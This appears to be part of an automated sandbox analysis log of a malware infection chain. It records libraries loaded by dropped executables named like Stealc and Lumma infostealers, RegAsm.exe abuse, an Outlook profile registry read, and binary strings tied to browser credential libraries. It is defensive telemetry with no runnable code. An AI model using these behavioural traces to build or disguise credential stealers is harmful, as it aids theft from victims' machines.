Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msisip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wshext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appxsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: opcservices.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: esdsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: scrrun.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: linkinfo.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: textshaping.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: textinputframework.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: coremessaging.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: coremessaging.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: msisip.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: wshext.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: esdsip.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: file.exe Static file information: File size 1940480 > 1048576
Source: file.exe Static PE information: Raw size of tutljgzd is bigger than: 0x100000 < 0x1a8200
Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: RegAsm.exe, 0000000B.00000002.3536050802.0000000005D88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mozglue.pdbP source: stealc_default2.exe, 00000017.00000002.3113843128.000000006958D000.00000002.00000001.01000000.0000001C.sdmp, svchost015.exe, 0000001E.00000002.3461869295.0000000068EFD000.00000002.00000001.01000000.0000001C.sdmp
Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 0000000B.00000002.3536050802.0000000005D88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdb8 source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nss3.pdb@ source: stealc_default2.exe, 00000017.00000002.3114439180.000000006974F000.00000002.00000001.01000000.0000001B.sdmp, svchost015.exe, 0000001E.00000002.3468864393.00000000690BF000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: System.ServiceModel.pdb693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32^ source: RegAsm.exe, 0000000B.00000002.3518496175.0000000000DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 0000000B.00000002.3516704262.0000000000B37000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.ServiceModel.pdb source: RegAsm.exe, 0000000B.00000002.3536050802.0000000005DCA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: stealc_default2.exe, 00000017.00000002.3114439180.000000006974F000.00000002.00000001.01000000.0000001B.sdmp, svchost015.exe, 0000001E.00000002.3468864393.00000000690BF000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegAsm.exe, 0000000B.00000002.3518496175.0000000000DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: stealc_default2.exe, 00000017.00000002.3113843128.000000006958D000.00000002.00000001.01000000.0000001C.sdmp, svchost015.exe, 0000001E.00000002.3461869295.0000000068EFD000.00000002.00000001.01000000.0000001C.sdmp
